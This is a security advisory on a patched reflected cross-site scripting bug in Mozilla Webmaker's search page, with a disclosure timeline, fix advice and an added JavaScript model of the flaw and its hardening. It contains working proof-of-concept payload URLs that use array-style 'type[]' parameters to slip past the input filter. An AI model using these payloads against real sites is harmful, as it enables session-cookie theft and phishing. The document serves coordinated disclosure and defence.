Document Title:
===============
Mozilla WebMaker - Filter Bypass & Cross Site Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=981
Mozilla Bug ID: 835445
Release Date:
=============
2013-07-09
Vulnerability Laboratory ID (VL-ID):
====================================
981
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Mozilla Webmaker is Mozilla's educational initiative. Webmaker's goal is to "help millions of people move from
using the web to making the web." As part of Mozilla's non-profit mission, Webmaker aims "to help the world increase
their understanding of the web, take greater control of their online lives, and create a more web literate planet."
Welcome to Webmaker — a Mozilla project dedicated to helping you create something amazing on the web. Our tools,
events and learning guides allow webmakers to not only create the content that makes the web great, but — perhaps more
importantly — understand how the web works. With this knowledge, we can make a web without limits. That's the philosophy
behind webmaker.org. We've built everything so you can remix it.
(Copy of the Vendor Homepage: https://webmaker.org/)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an input filter bypass and a client side vulnerability in the official Mozilla Webmaker Web Application.
Vulnerability Disclosure Timeline:
==================================
2013-06-21: Researcher Notification & Coordination (Ateeq Khan)
2013-06-21: Vendor Notification (Mozilla Security Incident Team)
2013-06-25: Vendor Response/Feedback (Mozilla Security Incident Team)
2013-06-28: Vendor Fix/Patch (Mozilla Developer Team)
2013-07-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Mozilla
Product: WebMaker Application & Service 2013 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Low
Technical Details & Description:
================================
A reflected XSS vulnerability has been discovered in the main web application of Mozilla Webmaker: the current security
controls of the web application can be bypassed using a fairly rare technique. During the initial tests it was noticed
that the search module of the Webmaker website takes two parameters:
1) type=
2) q=
The values of both parameters are reflected on the page in the search results, and the usual malicious script code
requests are filtered. However, by submitting the parameter in JavaScript-style dynamic array notation, it is possible to
define the `type` parameter multiple times; doing so makes the application behave in an unexpected way and results in a
successful filter bypass. Appending [] to the `type` parameter name (type[]) bypasses all filters, and it is then possible to
inject malicious script code and execute client-side XSS attacks. The researcher was able to use the same parameter
dynamically to execute multiple payloads at the same time. All steps are detailed in the PoC section of this advisory.
Exploitation of this vulnerability requires a non-privileged user (attacker) and low user interaction (victim). Successful
exploitation results in hijacking of user session cookies, client-side URL redirects, phishing attacks and similar
client-side attack vectors. This vulnerability affects all internet users, including Webmaker, Thimble and Popcorn users.
Vulnerable Service(s):
[+] Mozilla Webmaker Website (www.webmaker.org)
Vulnerable Module(s):
[+] Search
Vulnerable Parameter(s):
[+] /search/type=[XSS|IVE]
Proof of Concept (PoC):
=======================
The reflected XSS vulnerability can be exploited by anyone browsing the internet and using the Mozilla Firefox browser.
For demonstration or reproduction ...
PoC #1 (Single Payload)
1) https://webmaker.org/search?type[]="><script>alert(document.cookie)</script>
PoC #2 (Dynamic Javascript Array, Multiple Payloads)
2) https://webmaker.org/search?type[0]="><script>alert(137)</script>&type[1]="><script>alert(137)</script>
Source code showing the injected iframes for the PoC:
<div id="midbar">
<div class="search-poster" data-query="webmaker:featured">
<div class="ui-wrapper">
<div class="giant-search-container">
<h1 class="main-title">What are you looking for?</h1>
<form class="search-wrapper" action="" method="get">
<div id="search-type" class="search-filter">
<input type="hidden" name="type" value=""><iframe src="http://www.vulnerability-lab.com"></iframe>">
<span data-selected><span class="icon-"><iframe src="http://www.vulnerability-lab.com"></iframe>"></span></span>
<span class="icon-caret-down"></span>
<div class="filter-list ui-select-menu">
Solution - Fix & Patch:
=======================
Users should not be allowed to define the same parameter multiple times, because this results in abnormal behaviour of the
web application and is the root cause of the filter bypass in this situation. Proper user input sanitization should be
performed in the web application source code so that all malicious script code requests are blocked.
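The following is an added example and is not Webmaker's code or part of the original advisory. It models, in JavaScript (Node), the bypass described in the Technical Details section and the fix proposed above: a qs-style query parser that turns `type[]=...` and `type[0]=...` into an array (an assumption about how the parameter was parsed, not a statement about Webmaker's framework), a blocklist filter that only inspects strings and therefore lets an array value through, and a hardened handler that rejects a parameter supplied more than once and HTML-escapes the single value it reflects. The payload string and query strings are constructed for the demonstration.

```javascript
// Added example (not Mozilla Webmaker's code): models the "type[]" filter
// bypass described in this advisory and the fix proposed in the Solution.
// Assumption: the framework parses "type[]=x" / "type[0]=x" into an array.

// Parse a query string the way many web frameworks do: "type[]=a" and
// "type[0]=a" become an array under the key "type"; plain keys stay strings.
function parseQuery(qs) {
  const out = {};
  for (const [rawKey, value] of new URLSearchParams(qs)) {
    const m = rawKey.match(/^([^\[\]]+)\[\d*\]$/);
    if (m) {
      if (!Array.isArray(out[m[1]])) out[m[1]] = [];
      out[m[1]].push(value);
    } else {
      out[rawKey] = value;
    }
  }
  return out;
}

// Blocklist filter of the kind the advisory reports as bypassed: it only
// inspects string values, so an array (from type[]=...) passes through.
const SCRIPT_PATTERN = /<\s*\/?\s*(script|iframe)\b/i;
function naiveFilter(value) {
  return typeof value === 'string' && SCRIPT_PATTERN.test(value) ? '' : value;
}

// Vulnerable reflection: the filtered value is concatenated into the hidden
// input. An array is stringified ("a,b"), so every element lands in the HTML
// unfiltered and unescaped, matching what the PoC page source shows.
function renderVulnerable(query) {
  const type = naiveFilter(query.type);
  return `<input type="hidden" name="type" value="${type}">`;
}

// Output encoding for an HTML attribute/text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Hardened reflection: a parameter given more than once (array form) is
// rejected instead of coerced, and the single value is escaped on output.
// Returns null when the request is rejected.
function renderHardened(query) {
  const type = query.type;
  if (typeof type !== 'string') return null;
  return `<input type="hidden" name="type" value="${escapeHtml(type)}">`;
}

// Constructed demonstration input (the payload form used in the PoC above).
const PAYLOAD = '"><script>alert(1)</script>';
const ARRAY_QS = 'type[]=' + encodeURIComponent(PAYLOAD) + '&q=test';
const PLAIN_QS = 'type=' + encodeURIComponent(PAYLOAD) + '&q=test';

console.log('plain, vulnerable :', renderVulnerable(parseQuery(PLAIN_QS))); // filter catches it
console.log('array, vulnerable :', renderVulnerable(parseQuery(ARRAY_QS))); // filter bypassed
console.log('array, hardened   :', renderHardened(parseQuery(ARRAY_QS)));   // null: rejected
console.log('plain, hardened   :', renderHardened(parseQuery(PLAIN_QS)));   // escaped
```

Rejecting any non-string value covers both the `type[]` and the indexed `type[0]`, `type[1]` forms from the PoC in one check, and escaping on output means the hidden input is safe even if the blocklist misses a payload. Where the parameter has a small fixed set of legitimate values, as a search type filter usually does, comparing it against an allowlist before reflecting it is a stronger control than any blocklist.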
Security Risk:
==============
The security risk of the input filter bypass and reflected cross site scripting web vulnerability is estimated as medium (+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan ([email protected])
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.
Copyright © 2013 | Vulnerability Laboratory